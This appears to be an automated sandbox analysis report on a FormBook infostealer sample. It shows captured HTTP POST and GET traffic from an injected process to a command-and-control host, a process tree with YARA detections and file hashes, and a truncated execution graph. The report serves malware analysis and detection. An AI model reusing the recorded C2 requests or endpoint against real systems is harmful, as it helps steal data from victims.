                                                        Data Ascii: status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this error screen to www.spinpinang01.click's <a href="mailto:hosting-notifications.com?subject=Error message []
                                                        Jan 11, 2025 02:54:32.005352974 CET350INData Raw: 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 34 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20
                                                        Data Ascii: ogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.104998484.32.84.32806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:37.099807978 CET677OUTPOST /c3ib/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.athanasopoulos.xyz
                                                        Origin: http://www.athanasopoulos.xyz
                                                        Referer: http://www.athanasopoulos.xyz/c3ib/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 194
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 59 63 39 7a 74 49 37 2f 73 55 6b 74 6f 44 31 4c 41 66 73 39 65 32 58 49 69 6f 38 2b 61 72 50 68 4a 30 75 78 65 5a 6b 35 48 70 63 41 30 50 63 54 36 4d 71 32 4f 76 32 64 2b 31 39 4d 73 78 52 52 43 64 36 57 31 31 5a 35 4b 71 6f 45 71 53 74 74 34 41 7a 41 54 4d 34 32 4a 43 69 34 77 69 4f 75 51 53 6c 38 31 37 6d 38 32 6b 2b 66 52 44 42 78 75 77 66 42 6f 53 64 53 7a 6b 73 39 70 66 63 47 6e 4f 49 49 34 65 4e 6f 69 32 33 37 51 58 4b 63 46 77 79 67 4d 34 6e 52 6c 46 6b 4c 73 7a 75 39 30 35 63 30 54 6a 6a 57 50 48 4d 49 32 56 62 62 56 4a 34 44 4c 65 4d 70 2b 53 6d 64
                                                        Data Ascii: 0lTTc=Yc9ztI7/sUktoD1LAfs9e2XIio8+arPhJ0uxeZk5HpcA0PcT6Mq2Ov2d+19MsxRRCd6W11Z5KqoEqStt4AzATM42JCi4wiOuQSl817m82k+fRDBxuwfBoSdSzks9pfcGnOII4eNoi237QXKcFwygM4nRlFkLszu905c0TjjWPHMI2VbbVJ4DLeMp+Smd


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.104998584.32.84.32806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:39.646497965 CET701OUTPOST /c3ib/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.athanasopoulos.xyz
                                                        Origin: http://www.athanasopoulos.xyz
                                                        Referer: http://www.athanasopoulos.xyz/c3ib/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 218
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 59 63 39 7a 74 49 37 2f 73 55 6b 74 6e 44 6c 4c 54 73 30 39 4f 6d 58 48 74 49 38 2b 50 62 4f 6f 4a 30 79 78 65 63 41 58 45 62 49 41 30 71 34 54 37 4e 71 32 4c 76 32 64 78 56 39 46 78 42 52 59 43 64 32 6b 31 77 68 35 4b 71 73 45 71 57 39 74 34 7a 4c 42 52 63 34 30 63 53 69 2b 75 53 4f 75 51 53 6c 38 31 37 6a 6e 32 67 53 66 52 54 78 78 6f 6c 7a 43 67 79 64 52 30 6b 73 39 74 66 63 43 6e 4f 49 50 34 66 41 4e 69 79 48 37 51 56 43 63 46 46 47 68 43 34 6d 61 68 46 6c 79 76 44 50 49 75 72 6f 56 65 41 48 38 51 78 74 68 34 55 6d 63 45 59 5a 55 59 70 51 6e 77 55 54 33 71 4e 68 32 66 35 70 2f 72 4c 44 6c 45 78 79 75 59 30 79 49 72 77 3d 3d
                                                        Data Ascii: 0lTTc=Yc9ztI7/sUktnDlLTs09OmXHtI8+PbOoJ0yxecAXEbIA0q4T7Nq2Lv2dxV9FxBRYCd2k1wh5KqsEqW9t4zLBRc40cSi+uSOuQSl817jn2gSfRTxxolzCgydR0ks9tfcCnOIP4fANiyH7QVCcFFGhC4mahFlyvDPIuroVeAH8Qxth4UmcEYZUYpQnwUT3qNh2f5p/rLDlExyuY0yIrw==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.104998684.32.84.32806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:42.199033022 CET1714OUTPOST /c3ib/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.athanasopoulos.xyz
                                                        Origin: http://www.athanasopoulos.xyz
                                                        Referer: http://www.athanasopoulos.xyz/c3ib/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1230
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 59 63 39 7a 74 49 37 2f 73 55 6b 74 6e 44 6c 4c 54 73 30 39 4f 6d 58 48 74 49 38 2b 50 62 4f 6f 4a 30 79 78 65 63 41 58 45 61 77 41 31 5a 41 54 36 75 43 32 4d 76 32 64 34 31 39 49 78 42 51 61 43 64 2f 74 31 78 63 47 4b 6f 6b 45 72 30 31 74 70 53 4c 42 62 63 34 30 44 69 69 2f 77 69 50 75 51 53 56 77 31 37 7a 6e 32 67 53 66 52 51 35 78 2b 41 66 43 6d 79 64 53 7a 6b 73 78 70 66 64 56 6e 4f 51 41 34 66 55 7a 69 68 50 37 65 56 79 63 57 44 71 68 4f 34 6d 59 6b 46 6c 44 76 44 44 68 75 72 30 6e 65 42 6a 57 51 32 5a 68 36 79 48 56 51 4d 64 53 4d 71 4a 2f 7a 55 33 4f 75 71 6f 4b 61 61 41 61 38 35 54 6c 59 51 54 5a 5a 51 6e 63 37 50 4b 4b 46 4a 64 69 64 4d 2f 71 61 39 67 66 54 66 63 51 66 50 36 30 2b 70 30 4b 6a 72 64 38 75 62 46 77 4b 67 6a 62 53 66 42 41 41 51 72 7a 66 42 7a 2f 4f 59 73 34 70 75 45 4f 44 69 5a 2b 50 74 30 38 54 79 44 79 6b 34 61 45 49 61 6e 6a 4f 75 75 54 38 73 69 48 67 44 59 43 34 79 71 55 37 6c 31 50 64 75 2f 57 70 51 46 50 4f 7a 65 55 51 36 57 6a 78 6b 44 6c 36 36 51 4d [TRUNCATED]
                                                        Data Ascii: 0lTTc=Yc9ztI7/sUktnDlLTs09OmXHtI8+PbOoJ0yxecAXEawA1ZAT6uC2Mv2d419IxBQaCd/t1xcGKokEr01tpSLBbc40Dii/wiPuQSVw17zn2gSfRQ5x+AfCmydSzksxpfdVnOQA4fUzihP7eVycWDqhO4mYkFlDvDDhur0neBjWQ2Zh6yHVQMdSMqJ/zU3OuqoKaaAa85TlYQTZZQnc7PKKFJdidM/qa9gfTfcQfP60+p0Kjrd8ubFwKgjbSfBAAQrzfBz/OYs4puEODiZ+Pt08TyDyk4aEIanjOuuT8siHgDYC4yqU7l1Pdu/WpQFPOzeUQ6WjxkDl66QMW6x5LPwfuQyCc1D+paZLDPReqBNCliluvTgA93z+jY2+8CNS0AGnD3Z/VbfVfj9I44jkrxHRV3Yqkb6ul3YycLvHwv/CXNUxIjslsvjRSFN1bTCp7K+T2w6qJDffOpvrjO9s29UGMxXfmLknWHUDYHWRCbmEBY3L1gcBLSS0ltPR+mqhUFfhUwenbyKCPNiVUNdbhpnPhxSllbZ8xiv9xN8kOiLu2s6bUcsgP47CmkQ1fbNzboRXg8PKn6DQSEMMGr2ol9yjXxQD87d8J7z2QzbEgpNa3+w25hLdxyStrlBOAJZyIIUbXDXQDCltONKn+uYLqFUd5I1tCEKtDL9EIyDFgnmjapKTfxZiRSo6PD2w/hMDXgokfwftNy92t9G4mdqCyVi3stTG0/WiAkd2WIXB5Jq8ag0f8wolRlQKv/3ZmI7w4CGDJCj43pUAWwGkQXbphEtUxrdp58f9FAuH+qh722kRXFLN6JTb5s41xpInshVzYMay4NeNccZJOSdcdmlBmJZG1tNkh01llEL62F/zaw+pVJUXSbeyBRvuqfLow3WutPjz0vudMQQ7ZSnMRnGbJKVzMuwCLB3/B4NwTL2u2TCiLqGPLYqYduWfSrSnzBfjQLPkexMs6h6boQ62GFFuHz43Alz6PglUbNrs71b3bR+ze9pHU4 [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.104998784.32.84.32806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:44.736860991 CET401OUTGET /c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPk HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.athanasopoulos.xyz
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Jan 11, 2025 02:54:45.193135023 CET1236INHTTP/1.1 200 OK
                                                        Date: Sat, 11 Jan 2025 01:54:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 9973
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Server: hcdn
                                                        alt-svc: h3=":443"; ma=86400
                                                        x-hcdn-request-id: 9afcf731ab2b78a85b312dc22cf1ec21-bos-edge1
                                                        Expires: Sat, 11 Jan 2025 01:54:44 GMT
                                                        Cache-Control: no-cache
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                        Jan 11, 2025 02:54:45.193166018 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                        Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                        Jan 11, 2025 02:54:45.193177938 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                        Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                        Jan 11, 2025 02:54:45.193190098 CET672INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                        Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                        Jan 11, 2025 02:54:45.193459988 CET1236INData Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69
                                                        Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
                                                        Jan 11, 2025 02:54:45.193471909 CET1236INData Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73
                                                        Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
                                                        Jan 11, 2025 02:54:45.193483114 CET1236INData Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77
                                                        Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
                                                        Jan 11, 2025 02:54:45.193533897 CET1236INData Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67
                                                        Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal i
                                                        Jan 11, 2025 02:54:45.193547010 CET988INData Raw: 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b
                                                        Data Ascii: (m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:20:52:38
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\5by4QM3v89.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\5by4QM3v89.exe"
                                                        Imagebase:0x390000
                                                        File size:1'225'728 bytes
                                                        MD5 hash:6C05E87405D63CB15D69816ADABE9910
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:20:52:42
                                                        Start date:10/01/2025
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\5by4QM3v89.exe"
                                                        Imagebase:0x1f0000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:20:53:19
                                                        Start date:10/01/2025
                                                        Path:C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe"
                                                        Imagebase:0xfe0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:20:53:21
                                                        Start date:10/01/2025
                                                        Path:C:\Windows\SysWOW64\control.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\control.exe"
                                                        Imagebase:0xa00000
                                                        File size:149'504 bytes
                                                        MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:20:53:34
                                                        Start date:10/01/2025
                                                        Path:C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe"
                                                        Imagebase:0xfe0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:10
                                                        Start time:20:53:46
                                                        Start date:10/01/2025
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff613480000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.9%
                                                          Dynamic/Decrypted Code Coverage:1.5%
                                                          Signature Coverage:6.8%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:61
                                                          execution_graph 100754 3cfdfc 100797 39ab30 Mailbox _memmove 100754->100797 100756 3e617e Mailbox 59 API calls 100778 39a057 100756->100778 100760 3b0db6 59 API calls Mailbox 100775 399f37 Mailbox 100760->100775 100761 3d0055 100969 3f9e4a 90 API calls 4 library calls 100761->100969 100763 39b475 100970 398047 100763->100970 100765 39b47a 100765->100761 100781 3d09e5 100765->100781 100767 3d0064 100772 398047 59 API calls 100772->100775 100773 397667 59 API calls 100773->100775 100774 3b2d40 67 API calls __cinit 100774->100775 100775->100760 100775->100761 100775->100763 100775->100765 100775->100772 100775->100773 100775->100774 100777 3e6e8f 59 API calls 100775->100777 100775->100778 100779 3d09d6 100775->100779 100782 39a55a 100775->100782 100947 39c8c0 332 API calls 2 library calls 100775->100947 100948 39b900 60 API calls Mailbox 100775->100948 100777->100775 100977 3f9e4a 90 API calls 4 library calls 100779->100977 100978 3f9e4a 90 API calls 4 library calls 100781->100978 100976 3f9e4a 90 API calls 4 library calls 100782->100976 100785 39b2b6 100967 39f6a3 332 API calls 100785->100967 100788 3d086a 100789 399c90 Mailbox 59 API calls 100788->100789 100792 3d085c 100789->100792 100790 3d0878 100975 3f9e4a 90 API calls 4 library calls 100790->100975 100792->100756 100792->100778 100793 39b21c 100954 399d3c 100793->100954 100795 3b0db6 59 API calls Mailbox 100795->100797 100796 39b22d 100798 399d3c 60 API calls 100796->100798 100797->100775 100797->100778 100797->100785 100797->100788 100797->100790 100797->100792 100797->100793 100797->100795 100799 39b525 100797->100799 100800 3e6e8f 59 API calls 100797->100800 100806 399ea0 100797->100806 100830 40df23 100797->100830 100833 41241e 100797->100833 100846 40445a 100797->100846 100855 3f8715 100797->100855 100859 40df37 100797->100859 100862 40c2e0 100797->100862 100894 3f7956 100797->100894 100900 397de1 100797->100900 100904 40bc6b 100797->100904 100944 3e617e 100797->100944 100949 399c90 100797->100949 100968 40c193 86 API calls 2 library calls 100797->100968 100798->100785 100974 3f9e4a 90 API calls 4 library calls 100799->100974 100800->100797 100807 399ebf 100806->100807 100825 399eed Mailbox 100806->100825 100979 3b0db6 100807->100979 100809 39b475 100810 398047 59 API calls 100809->100810 100823 39a057 100810->100823 100811 39b47a 100812 3d0055 100811->100812 100828 3d09e5 100811->100828 100991 3f9e4a 90 API calls 4 library calls 100812->100991 100816 3b0db6 59 API calls Mailbox 100816->100825 100817 3d0064 100817->100797 100819 397667 59 API calls 100819->100825 100820 398047 59 API calls 100820->100825 100822 3b2d40 67 API calls __cinit 100822->100825 100823->100797 100824 3e6e8f 59 API calls 100824->100825 100825->100809 100825->100811 100825->100812 100825->100816 100825->100819 100825->100820 100825->100822 100825->100823 100825->100824 100826 3d09d6 100825->100826 100829 39a55a 100825->100829 100989 39c8c0 332 API calls 2 library calls 100825->100989 100990 39b900 60 API calls Mailbox 100825->100990 100993 3f9e4a 90 API calls 4 library calls 100826->100993 100994 3f9e4a 90 API calls 4 library calls 100828->100994 100992 3f9e4a 90 API calls 4 library calls 100829->100992 101023 40cadd 100830->101023 100832 40df33 100832->100797 100834 399837 85 API calls 100833->100834 100835 412436 100834->100835 100836 397667 59 API calls 100835->100836 100837 412444 100836->100837 101185 399b3c 100837->101185 100839 41244f 100840 412479 100839->100840 100842 399837 85 API calls 100839->100842 101189 399a3c 59 API calls Mailbox 100840->101189 100844 41246a 100842->100844 100843 412485 Mailbox 100843->100797 100845 39784b 59 API calls 100844->100845 100845->100840 100847 399837 85 API calls 100846->100847 100848 404494 100847->100848 101191 396240 100848->101191 100850 4044a4 100851 4044c9 100850->100851 100852 399ea0 332 API calls 100850->100852 100854 4044cd 100851->100854 101216 399a98 59 API calls Mailbox 100851->101216 100852->100851 100854->100797 100856 3f871e 100855->100856 100857 3f8723 100855->100857 101236 3f77b3 100856->101236 100857->100797 100860 40cadd 131 API calls 100859->100860 100861 40df47 100860->100861 100861->100797 100863 397667 59 API calls 100862->100863 100864 40c2f4 100863->100864 100865 397667 59 API calls 100864->100865 100866 40c2fc 100865->100866 100867 397667 59 API calls 100866->100867 100868 40c304 100867->100868 100869 399837 85 API calls 100868->100869 100892 40c312 100869->100892 100870 397924 59 API calls 100870->100892 100871 397bcc 59 API calls 